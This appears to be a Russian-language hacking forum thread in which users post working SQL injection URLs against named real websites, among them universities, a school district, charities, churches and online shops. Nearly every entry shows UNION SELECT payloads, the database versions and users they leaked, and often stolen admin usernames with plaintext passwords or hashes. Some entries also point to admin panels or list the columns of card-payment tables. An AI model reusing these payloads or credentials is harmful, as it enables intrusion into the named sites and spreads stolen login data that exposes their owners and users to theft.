5.0.67-log:u12550@10.10.153.190:u12550

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables

Заинтересовала только одна таблица: ACS

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,1 2,13,14,15+from+information_schema.columns+where+T ABLE_NAME=0x414353

ID_ACS
ID_SITE
ID_MENU
AUTH_ADMIN
PASS_ADMIN
PRIM

казалось бы. то что нужно... попробовал вывести содержимое, ничего...

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,count(*),7,8,9,10,11,12,1 3,14,15+from+ACS

нет записей..

PR: 4

http://www.earthsystem-school.unimore.it/tematiche.php?id=1+union+select+1,version(),3,4--

5.0.45

http://www.earthsystem-school.unimore.it/tematiche.php?id=1+union+ select+1,table_name,3,4 +from+informati on_schema.tables--

Ky4a tables)))

http://antesthermo.ru/03topmenu/09news/?cont_id=235+and+1=0+union+select+1,2,3,4,5,6,7,8, concat(name,0x3a,pass),0,1,2,3,4,5+from+users--

PR: 5
http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,versio n(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,2 3,24 ,25,26--

5.0.41-log

on9Tb Ha6oP tables:

http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26+from+information_schema .tables+group+by+table_s chema+limit+0,1--

acquisti,acquisti_dettagli,biblioteca,checklist,co mputer,concorsi,decreti,dsa_lista_attesa,dsa_log_r ichiesta_intervento,dsa_utenti,elenco_software,int _report,int_richieste,log_accessi,messaggi,monitor ,ni_cliente,ni_compatibilita_ricambio_stampante,ni _log_consumabili,ni_magazzino_ricambi_stampante,ni _modello_stampante,ni_oggetto,ni_on


#######################################
PR: 4

http://it.pewaukee.k12.wi.us/employment/ath_jo bs/viewjobcategory_ath.php?ID=-1+union +s elect+1,concat_ws(0x3a,version(),databas e() ,user()),3/*

4.0.26a:employ_athl:jappt@localhost

[Site]: http://banzaj-ra.com
[Info]: 5.0.51-log:1gbua_x_banza5aa@213.186.117.199:1gbua_x_banza 5aa
[Sploit]: http://banzaj-ra.com/index.php?mod=news&id=-1+union+select+1,concat_ws(0x3a,login,password,mai l),3,4+from+user--

P.S.
Кавычки пропускает, но вроде как прав не хватает.

URL: http://www.sbiznis.com/grad.php?id=138+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14
INFO: http://www.sbiznis.com/grad.php?id=-138+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14
4.0.27-max-log:sbiznis@68.178.232.60:sbiznis
DIR SITE: /home/content/b/i/z/biznis/html

Кстати вот ещё: особенно не раскручивал, но думаю сойдёт
http://www.biomedicas.unam.mx/investigacionFrame.asp?ID=MG%27+or+1=(select+top+1 +table_name+from+information_schema.tables)+--+

http://www.deltarescue.org/deltarescue/war/item.php?id=-21+union+select+1,cast(concat_ws(0x3a,version(),da tabase(),user())+as+binary),3,4,5,6,7--

4.1.11-Debian_4sarge8-log:deltarescue:deltarescue@localhost
_____
http://www.minelab.com/consumer/page.php?section=-128+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

4.0.24-nt-max-log:vs255889_1:vs255889_1_dbo@wic016v.server-web.com

<<Newton's Apple>>
http://www.newtonsapple.tv/TeacherGuide.php?id=902'+union+select+1,2,3,concat _ws(0x3a2a3a,version(),database(),user(),@@version _compile_os),5,6,7,8,9,0,1,2,3,4,5--+
4.1.20:*:newtons:*:tpt@tptwebserver.win2k.tpt.org: *:redhat-linux-gnu

http://test.omnisoftsol.com/listing_video.php?catid=3
version(): 4.1.22-standard
user(): omnisoft@localhost
database(): vsec_test

Tables:
customers
phpads_config
phpads_clients
products
phpads_affiliates

http://www.surfchanneltv.net/listing_video.php?catid=29
version(): 4.1.22-standard
user(): surfchan@localhost
database(): surfchan

Tables:
customers
phpads_config
phpads_clients
products
phpads_affiliates

PR4
http://www.stpaulseatingdisorders.ca/content.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+/*+

http://www.context-market.ru/news.php?id=198&item=225+union+select+1,2,database(),4,5,6,7,8,9,1 0+/*+
cmarket

http://www.amento.ru/news/new.php?id=-16+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5
4.1.22-log:amento@localhost:amento

http://www.amento.ru/news/new.php?id=-16+union+select+1,2,3,concat_ws(0x3a,user,password ),5+from+users
amento:5c8904a4b82b1f9bfc3a115cfcd30528

админка: http://www.amento.ru/admin/

PR 0, ТИЦ 20

http://www.ldmstudio.com/director/detalii_site.php?id=-4677+UNION+SELECT+1,2,concat_ws(0x3a,version(),dat abase(),useR(),@@version_compile_os),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22--


Database Version: 5.0.77-community-log
Database name: ldm_director
User name: ldm_ldmbd@localhost
Os: pc-linux-gnu

ТИЦ: 50 PR: 2
http://www.svto.ru/page.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10/*

5.0.45

http://www.svto.ru/page.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8,9,10+from+information_schema.tables+group+by+t able_schema+limit+1,1/*

svto_pages,svto_member,svto_group_tov,svto_service ,svto_admins,svto_product,svto_news,svto_guestbook ,svto_tovar,svto_banners,svto_rubric,svto_offer,sv to_korz,svto_users,svto_feedback,svto_series,svto_ order,svto_manufacturer,svto_gallery_pics,svto_ser ies1,svto_about
5

PR5
http://www.abandonware-france.org/ltf_abandon/ltf_solutions.php?id_soluce=-146+union+select+1,2,3,concat(0x2C,id,char(58),pse udo,char(58),password,char(58),droits,char(58),typ e,0x2C),5+from+ltfv5_admin_membres--

1:wokie:revol-6::sadmin
2:wille:revol-6::sadmin
3:batjijo:revol-6::admin
4:sophie:ghost::admin
5:pseudopode:ltf0408pseudo::admin
6:ryf:revol-6::admin
7:maxou:revol-6::admin
8:victor:revol-6::admin
9:godcedric:*****::admin
10:roger:xxxxxxx::membre
11:Barbarian_bros:Leprince_Wyliam::sadmin
12:lordseb:djradio08::admin
13:zappy:krasno::admin
14:ubn22:evangelion::sadmin
15:Mendo:22249440::admin,

Сайт ОГРОМНЫЙ !!!
админку так и не нашёл((

ТИЦ: 40 PR: 3
http://www.knigazhizny.ru/view_zavalinka.php?id=-1'+union+select+1,version(),3,4,5,6,7,8,9,10+--+

5.0.67-community

online,zavalinka,book,comments,galstuk,settings,ca tclass,comments_setting,gazeta,staty,categories,de tcvo,kuhny,navigation,userlist,biblioteka,class,dn evnik

http://www.knigazhizny.ru/view_zavalinka.php?id=-1'+union+sel ect+1,group_concat(concat_ws(0x3a,user,pass)),3,4, 5,6,7,8,9, 10+from+u serlis t+--+

domhoz:hozd

http://www.liveatdot.com/program/details.php?id=224+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 +LIMIT+1,1

Database Version: 5.0.26
Database name: liveatdot_dates
User name: liveatdot22@localhost

http://www.freetests.ru/states.php?act=show&id=-1+union+select+1,2,version(),4,5--

5.0.67-percona-highperf-b7-log

http://www.freetests.ru/states.php?act=show&id=-1+union+select+1,2,group _concat(table_name),4,5+from+information_schema.ta bles+group+by+t able_schem a+limit+0,1--

ft_main,jos_polls,fr_news,jos_core_acl_aro_groups, wp_terms,ft_result,jos_template_positions,fr_theme s,jos_core_log_searches,ft_update,jos_weblinks,ft_ addit,jos_messages,eco_buyes,jos_bannerfinish,stro ika23_news,ft_forum_themes,jos_newsfeeds,eco_state s,jos_content,wp_postmeta,ft_news,jos_sections,fr_ passwords,jos_core_acl_aro_sections,wp_usermeta,ft _stat,jos_templates_menu,fr_trans,jos_groups,ft_us ers,kan_gb,ft_cat,jos_messages_cfg,eco_cats,jos_ca tegories,wp_comments,ft_gb,jos_poll_data,eco_users ,jos_content_frontpage,wp_posts,fr_answers,jos_con tent_rating,wp_term_relationships,ft_passwords,jos _session,fr_posts,jos_core_acl_groups_aro_map,wp_u sers,ft_states,jos_users,fr_users,jos_mambots,bori s_cats,jos_banner,kan_news,ft_forum_forums,jos_mod ules,eco_citats,jos_components,wp_links,ft_mail,jo s_poll_date,fr_cats,jos_core_acl_aro,wp_term_taxon omy,ft_question,jos_stats_agents,fr_system,jos_cor e_log_items,ft_subscribe,jos_usertypes,fr_userup,j os_menu,boris_photos,jos_bannerclient,stroika23_co ntent,ft_forum_posts,jos

globalmentalhealth.org Pr-5
Форум: http://globalmentalhealth.org/forum/
http://www.globalmentalhealth.org/articles.php?id=-1+union+select+1,2,null,schema_name,5,6,7,8,9,10+f rom+information_schema.schemata+limit+2,1

gmhorg_phpBB


http://www.globalmentalhealth.org/articles.php?id=-1+union+select+1,2,null,concat(username,0x3a,user_ password),5,6,7,8,9,10+from+gmhorg_phpBB.phpbb_use rs+limit+1,1


bala:$H$7zp4zVUO3SA6YklQHSK2rex6B71r0F1

расшифровывать не хочу.

http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,concat_ws(version(),user(),dat abase()),4,5,6,7,8,9,10,11,12,13

babykn_babykn@localhost5.0.77-communitybabykn_babykn

http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,table_name,4,5,6,7,8,9,10,11,1 2,13+from+information_schema.tables

pr2,тиц 210

http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12--

5.0.67-log:u156180@10.10.227.61:u156180

http://moraru.ru/prod.php?id_product=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 +from+information_schema.tables--
большое количество таблиц, около 300.
там нашел таблицу: b_user

http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,10,11,12+from+b_user--

admin:Iq{28kX{10d8e0838e85fcc17ccd06fe9eb9af4f

PR 2, ТИЦ 10

http://totalshottrainer.com/content.php?id=-4+union+select+1,database(),3,4,5,6,7,8,9,10,11,12 ,13,14,15+/*+
totalsho_totalsho

[URL]: http://29r.ru
[Info]: 5.0.75-percona-highperf-b11-log:a3940_test@94.103.90.190:a3940_test
[Sploit]: http://29r.ru/index.php?page=6_0&id=-1+union+select+1,2,3,concat_ws(0x3a,user,pwd)+from +users+--+

http://www.detki-74.ru/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--

admin-3bb5029c0a7f3f6b81e744ea798e3d9d

http://www.dyadem.com/media/pr.php?id=-3909+union+selecT+1,2,3,4,concat_ws(0x3a,version() ,user(),database())

4.1.22-community-nt:darren@localhost:cms

DocumentRoot: C:\Program Files\Apache Software Foundation\Apache2.2\htdocs

PR 5, ТИЦ 10

Антибайан: checked
----------------------------
http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13

4.0.27-max-log:ecpaweb@68.178.211.7:ecpaweb

http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,usernam e,password),8,9,10,11,12,13+from+admin

sheri:monday

PR 6

Антибайан: checked

--------------------------------------------

http://www.steinerbooks.org/p.php?id=-7+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9

4.1.22:anthroposophic@localhost:steinerbooks

PR 4
---------------------------------------------
http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6

5.0.67-community:norilsk6_mainuse@localhost:norilsk6_mika norilsk

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,table_name,3,4,5,6+from+informat ion_schema.tables

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,login,password),3 ,4,5,6+from+tab_admin

User:Password - 888:999
-------------------------------------

http://www.amadey-center.ru/razdel.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5

4.1.22-log:amadeyce_linkomp@fe43.hc.ru:wwwamadeycenterr_l inkomp

-------------------------------------
http://www.pronv.com/razdel.php?id=-7+union+selecT+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9

4.1.22-MAX-LOG:PRONV@68.178.254.62:PRONV
------------------------------------

http://www.salisburycathedral.org.uk/news.php?id=-357+unioN+seLect+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,version(),19,20,21,22,23/*
Page Rank: 5
Database Version: 4.1.20
Database name: salisburycathedral
User name: salisburycathedr@localhost
tables:
homepage
links
log
news

http://www.ihrc.org.uk/show.php?id=-1412+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13--
Database Version: 4.0.27-standard-log
Database name: db120565932
User name: dbo120565932@212.227.119.149
tables:
info

http://www.footballfoundation.com/news.php?id=-905+union+select+1,2,3,4,5,6,7--
Page Rank: 6
Database Version: 4.1.10a-log
Database name: nff
User name: nff@localhost
tables:
admin
news

http://audiobookdeals.com/audiobook-news-show.php?id=-43+union+select+1,version(),3,4--
Page Rank: 2
Database Version: 4.1.22
Database name: audioboo_content
User name: audioboo_psostre@156389-web1.sostreassoc.com
tables:
articles
news

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6

5.0.32-Debian_7etch6-log:z73749_main@77.221.130.26:z73749_main

есть таблица: psg_user, с кучей столбцов (46)

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,column_name,6+from+informat ion_schema.columns+where+table_name=0x7073675f7573 657273+limit+46,1

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,first_name,p assword),6+from+psg_users
и т.д.

------------------------------
http://www.ruriders.com/statya.php?id=-15395+union+selecT+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),user(),database()),8,9,10,11,12,13

5.0.77-log:m58187_uIbarbe@localhost:m58187_Ibarbero


ТИЦ 100
---------------------------------
http://www.papor.ru/statya.php?id=48+union+selecT+1,2,3,4,concat_ws(0x 3a,version(),user(),database()),6,7,8,9,10,11

5.0.70-log:dbu_ansimov_1@localhost:pp

тиц 10

PR 2

http://www.tutpricol.ru/message.php?id=-1/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),5, 4,6,7+

adminka - http://www.tutpricol.ru/admin/
login - admin
pass - sevagin

version() - 4.1.22-log
user() - tutpric5_root@localhost
database() - tutpric5_tutpricol

PR3

http://www.promocamp.com/news.php?idnews=-527%20union%20select%201,concat_ws(0x3a,user(),dat abase(),version()),3,4,5,6,7,8

promocamp@localhost:promocamp:5.0.79

Tables:

assoc
cat
news
pr_agriturismi
pr_associazioni
pr_banner
pr_campeggi
pr_centri
pr_fiere
pr_legislazione
pr_link
pr_noleggiatori
pr_riviste
pr_sosta
prov
reg
sezioni

http://www.hetkookatelier.nl/admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users

PR7
https://www.iifiir.org/en/news.php?rub=2+union+select+1,2,TABLE_NAME,4,5,6+f rom+information_schema.tables--&page=2&id=1871#2 union select 1,2,TABLE_NAME,4,5,6 from information_schema.tables--
Нужные таблы закрыты((

http://www.studio2.gr/studio2/newsen.php?id=-18+union+select+1,username,3,4,password+from+users/*
studio2::!studio_dyo!

ari.ru Агентство Русской Информации

http://ari.ru/publication/?id=-203+union+select+1,concat_ws(0x203a20,version(),da tabase(),user(),@@version_compile_os)--

version():version():5.0.67
database():ariru3_
user():ariru3_ariru@localhost
os redhat-linux-gnu

выводим таблицы лимитом

http://ari.ru/publication/?id=-203+union+select+1,table_name+from+information_sch ema.tables+limit+15,1


таблица users

http://ari.ru/publication/?id=-203+union+select+1,table_name+from+information_sch ema.tables+limit+51,1

выводим юзверей лимитом

http://ari.ru/publication/?id=-203+union+select+1,concat(0x3a,nick,password)+from +users+limit+2,3

несколько юзверей:
Гром gridoza
Арт erasure
ИванЦ qawert
Виктор 198895
— Админ —Druzhinnik итд...

http://www.longwy.eu/index.php?pg=11&id=-517+union+select+1,2,group_concat(TABLE_NAME),4,5, 6,7,8+from+information_schema.tables/*

http://www.art-ks.org/index.php?id=-153+union+select+1,2,3,concat(login,char(58),pwd), 5,6,7,8,9,10+from+users/*
erhart::e10adc3949ba59abbe56e057f20f883e --123456

http://referat.by/subjects.php?btn=&level=2&subj=6&page=0&size=2&id=-152+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,Nam e,Passwd,rights),7+from+accounts--
1::Andrew::5d266ec24ed1234fd0a41c45912090e4::00000 0000000

PR3

http://viviravenna.it/dettevento.php?idevento=-14298+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5,6,7,8,9,10,11,12,13

viviravenna_it@localhost:viviravenna_it:5.0.79

http://viviravenna.it/dettevento.php?idevento=-14298+union+select+1,concat_ws(0x3a,user,userpwd), 3,4,5,6,7,8,9,10,11,12,13+from+m_utenti

Utente7150:17634
Utente3501:232094168
Utente7232:661581938

http://www.alternativegrounds.com/show.php?ID=-20+union+select+1,2,3,4,5,6,7,8,9--
Page Rank: 4
Database Version: 4.0.18-Max
Database name: alternativegro
User name: alternativegro@www6.inetwave.com
PS ниодной таблы ненашел :(

http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,version(),database(),user()),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

5.0.77-community-log:xnjafc_ifesworld:xnjafc_ifesworld@localhost

таблы:
http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,cast(group_ concat(table_name)+as+binary),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31+from+infor mation_schema.tables--
_______

http://www.latrobe.edu.au/lupa/news-item.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user())--

4.1.22-log:lupa:lupa@web.latrobe.edu.au
______

http://www.indstate.edu/news/news.php?newsid=-1785+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6--

5.0.45-community-nt-log:news:news@localhost

таблы:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,audiovideoare a,audiovideoaudience,audiovideoitem,dummy,experts_ guide,memberaccess,newsarea,newsaudience,newslogin ,newsmediaitem,newsmediatype,newspriority,newsstor y,newsstoryarea,newsstoryaudience,newsstorymediait em,photoarea,photoaudience,photoitem,presidentsear ch,searchaudience,searchcomments,searchlogin,audio videoarea,audiovideoaudience,audiovideoitem,dummy, experts_guide,memberaccess,newsarea,newsaudience,n ewslogin,newsmediaitem,newsmediatype,newspriority, newsstory,newsstoryarea,newsstoryaudience,newsstor ymediaitem,photoarea,photoaudience,photoitem,presi dentsearch,searchaudience,searchcomments,searchlog in

чуть-чуть акков (ID,username,password)
1:wherndon:Chuck1,
2:mlowry:camaroheaven,
3:jhiddle:dragon832,
4:dtaylor:rutabaga,
5:cdukate:patch03,
15:tford:cm1vp2,
7:pmeyer:cams2quik4u,
8:kspanuello:specialk,
31:sadla1:karuna,
25:tcampbell:nikond2x,
26:kberchem:Kosmo15,
30:jsicking:js8629

http://www.invivogen.com/family.php?ID=-97+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(0x3a,user(),database(),version()),16,17--
visiteur@localhost:invivo:4.1.22

http://www.bentel.ro/produse.php?idSubcategorie=3246&idProdus=-39409+union+select+concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),2


Database Version: 5.0.45
Database name: bentelsite
User name: bentelsite@localhost
Os:redhat-linux-gnu

PR 1
http://pirotex.ru/content.php?id=-23'+union+select+version()+from+news/*'
Вывод в <title> 4й ветка бд. таблицы ни одной не нашел
логин -1' or 1=1/*'
пас любой



jokester: ethaicd.com БОЯН, не нужно восстанавливать то, что я стираю

http://www.calcatinge.ro/index.php?idCategorie=47+UNION+SELECT+AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er(),@@version_compile_os),0x71),0x71),2--%20&lang=ro

Database Version: 5.0.77
Database name: calcat_calcatinge
User name: calcat_root@localhost
Os: portbld-freebsd6.2

http://www.mintakafoundation.org/projet.php?id=-1+union+select+1,2,concat_ws(0x20,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--

version 5.0.67-log
user mintakaDB@imu139.infomaniak.ch
database mintakafoundationorg

PR 3

http://www.globus.naztrans.ru/CityInfo.php?Number=-9600+union+select+concat_ws(0x202d20,version(),use r(),database(),@@version_compile_os),2,3,4,5

user() - karalex_georg@localhost
version() - 5.0.67-community
database() - karalex_globus
os - redhat-linux-gnu


В бд ничего интересного...
Список автомобилей, фото иды, коменты, новости.

cities
authors
gallereies
news
pages
photos
results
usercoments
video
etc...

http://www.mysupermarket.ro/produse.php?pID=227+union+select+1,2,3,4,concat_ws (0x3a,version(),database(),user(),@@version_compil e_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ limit+1,1

Database Version: 5.0.27
Database name: db_mysupermarketro
User name: mysupermarketro@localhost
Os: redhat-linux-gnu


http://www.mysupermarket.ro/produse.php?pID=227+UNION+SELECT+1,2,3,4,(SELECT+C ONCAT_ws(0x3a,aUsername,aPassword,aemail)+FROM+db_ mysupermarketro.Account+LIMIT+x,1),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+limit+1,1

ПР4
http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_u ser_type,admin_user_workflow,admin_username,admin_ password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+fro m+Admin_Users+/*+
1::1::ymca_2008::ymca_fitness

http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_u ser_type,admin_user_workflow,admin_username,admin_ password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+fro m+Admin_Users+/*+
1::1::ymca_2008::ymca_fitness

http://www.cnr-unesco.ro/ro/stire.php?id=-121+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11/*


Database Version: 4.1.22
Database name: tibiq_unesco
User name: tibiq_unesco@localhost
Os: redhat-linux-gnu

[PR 3]
http://www.timeshare-obmen.ru/bonus.php?id=-3448449+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0 x3a,version(),database(),user()),11,12,13--
5.0.26-log:timeshareb:timeshareb@localhost

[PR 3]
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user())--&lang=en
5.0.51a-community:piyanas_db:piyanas_piyanas@localhost
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(table_name),3+fro m+information_schema.tables--&lang=en
ilo_administrator_user
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(column_name),3+fr om+information_schema.columns+where+table_name=0x6 96c6f5f61646d696e6973747261746f725f75736572--&lang=en
columns from table ilo_administrator_user
administrator_id,username,password,menu1,menu2,men u3,menu4,menu5,menu6,menu9,description
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,concat_ws(0x3a,administrator_i d,username,password),3+from+ilo_administrator_user--&lang=en
administrator_id,username,password
1:admin:py9999
2:sale:1234
3:manager:1234

ШОП http://store.yeproc.com

_http://www.yeproc.com/upload/media/view_media.php?id=-459+union+select+1,2,3,user(),version(),6,7,8,9,10 ,11,12,13,14,15,16,17--


189 :In database redeyedb found table store_fixes_recreate_orders
0 : username
1 : full_name
2 : email
3 : order_number
4 : order_date
5 : order_date_time
6 : order_shipping
7 : order_tax
8 : order_total
9 : card_number
10 : product_id
11 : item_number
12 : product_type
13 : description
14 : artist_name
15 : value_add_flag
16 : quantity
17 : unit_price
18 : line_total
19 : bill_name_first
20 : bill_name_last
21 : bill_address1
22 : bill_address2
23 : bill_address3
24 : bill_city
25 : bill_state
26 : bill_postal_code
27 : bill_country
28 : bill_phone
29 : ship_name_first
30 : ship_name_last
31 : ship_address1
32 : ship_address2
33 : ship_address3
34 : ship_city
35 : ship_state
36 : ship_postal_code
37 : ship_country
38 : ship_phone

и вторая бд.

214 :In database redeyedb found table store_order
0 : id
1 : id_store
2 : id_store_user
3 : session_id
4 : order_number
5 : order_date
6 : subtotal
7 : tax
8 : shipping
9 : total
10 : card_type
11 : card_number
12 : card_expiration
13 : card_name
14 : bill_name_first
15 : bill_name_last
16 : bill_address1
17 : bill_address2
18 : bill_address3
19 : bill_city
20 : bill_state
21 : bill_postal_code
22 : bill_country
23 : bill_phone
24 : ship_name_first
25 : ship_name_last
26 : ship_address1
27 : ship_address2
28 : ship_address3
29 : ship_city
30 : ship_state
31 : ship_postal_code
32 : ship_country
33 : ship_phone
34 : facts_export_id
35 : digital_export_id

http://zona.zp.ua/boardname.php?c=-85+UNI ON+SELECT+0,concat_ws(0x0 b,user(),version(),database())
ivan_zona@localhost
5.0.77-community
ivan_zona

Логины пассы юзерей

http://zona.zp.ua/boardname.php?c=-85+UNION+SELECT+0,c oncat_ws(0x0b,password,u_email)+FROM+ivan_zona.use r s+--+

http://ok.salgir.info/ok_adv.php?gr=79&r=84+UNION+SELECT+1,CONCAT(user(),0x0b,database(), 0x0b,ve rsion()),3,4+FROM+users+LIMIT+1,10--

u_client_salgir@localhost
salgir
4.1.22-log

Юзеры

http://ok.salgir.info/ok_adv.php?gr=79&r=84+UN ION+SELECT+1,CONCAT(user(),0x0b,database(),0x0b,ve rsion()),3,4+FROM+u sers+LIMIT+1,10--


http://alchevsk-city.com/board.php?board=8'+UNION+SELECT+0,1,2,concat_ws(0x 0b,version(),datab ase(),us er()),4+--+

4.1.22-standard
total_city
total_city@localhost


http://crimea.swingua.net/index.php?find_age=-2+UNION+SELECT+0,2,3,4,5,6,7,CONCAT_WS(0x0b,Ve rsion(),Database(),U ser()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25+--+&find_month=300&find_status=6&find_who=100&mod=search&sortby=D


4.1.22-standard
handy_crimea
handy_crimea@localhost

PR6
http://www.augustana.edu/academics/music/department/facultyBio.php?ID=-1+union+select+1,2,3,4,concat_ws(0x3a,user,passwor d),6,7,8,9,10,11+from+mysql.user/*
Database Version: 4.1.22-log
Database name: music
User name: music@freya.augustana.edu

music:244ed17b5aa3b964

http://www.reformjudaismboston.org/content.php?id=-108'+union+select+1,database(),3,4,5,6,7,8,9,10,11 ,12+--+
reformjudaismboston_org_-_invision2

http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),useR(),@@version_compile_os),3,4--


Database Version: 5.0.54-log
Database name: netmedica
User name: netmedicasql@localhost
Os: pc-linux-gnu

http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_Ws(0x3a,user_name,user_pa sswd),3,4+FROM+netmedica.users+LIMIT+x,1--

0]:testuser:a/Uw5jGt4sWxY
[1]:testadmin:e2d1903c479e40495a09ee7e40e42de8
[2]:admin:gzAV0iFKm9PbU
[3]:gabi:3Kbi7htfFdTew
[4]:dafi:.S9LiwYFcjV2c
[5]:adm:e2d1903c479e40495a09ee7e40e42de8
[6]:aqsw12:e2d1903c479e40495a09ee7e40e42de8

pr6
http://www.semops.com/content.php?id=-296+union+select+1,2,3,4,5,6,7,database(),9,10+fro m+users+/*+
semops
Колонки не смог подобрать((

http://www.jimmcleantexas.com/content.php?id=-33+union+select+1,2,username,password,5,6,7,8,9+fr om+admin+/*+
admin::21232f297a57a5a743894a0e4a801fc3 - admin

-------------------------------------------------

http://www.clubservices.com.mx/prov.php?id=116+union+select+1,2,3,4,5,6,7

5.0.45:sci@localhost:SCI

таблицы: http://www.clubservices.com.mx/prov.php?id=-116+union+select+table_name,2,3,4,5,6,7+from+infor mation_schema.tables

--------------------------------------------------------
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database())

5.0.32-Debian_7etch10-log:hnk@localhost:hnk

нас интересует:
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,table_name +from+information_schema.tables+limit+34,1/*

поля:
user_id
type
first_name
last_name
email
login
password

Число записей: http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,count(*)+f rom+users/*
одна запись

http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,login,password)+from+users/*
zlatko:monografija

-------------------------------------

да простит меня Бог. следующий сайт
http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,3,4,5,6,7,8

http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,concat_ws(0x3a, version(),user(),database()),4,5,6,7,8
4.1.20:orthodox@localhost:orthodox

-------------------------------------

http://www.auchinachie.com/content.php?id=-8+union+select+1,2,id,4,password,6,7,8,9,10,11,12, 13,14,15+from+users+/*+
0000000247::bluepix05

